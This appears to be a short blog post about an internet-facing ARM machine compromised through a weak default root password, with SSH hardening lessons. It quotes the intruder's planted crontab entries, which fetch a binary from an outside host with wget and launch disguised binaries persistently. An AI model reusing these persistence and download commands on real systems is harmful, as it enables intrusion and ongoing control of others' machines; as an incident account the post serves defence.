Three days to posession
As an experiment, I hooked up a spare ARM machine to the internet and left it running Tor. It only took three days for a script kiddie to break in, as it turns out the pre-built rootfs I used has a poor default root password.
So the lessons are:
Always clear the root password.
Disable root login in sshd_config.
Disable password logins in sshd_config and use keys only.
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd */99 * * * * nohup /etc/cupsdd > /dev/null 2>&1& */100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
These are all x86 statically linked binaries. I don’t think they’re run too good on ARM 🙂
Time to nuke the system. It’s the only way to be sure.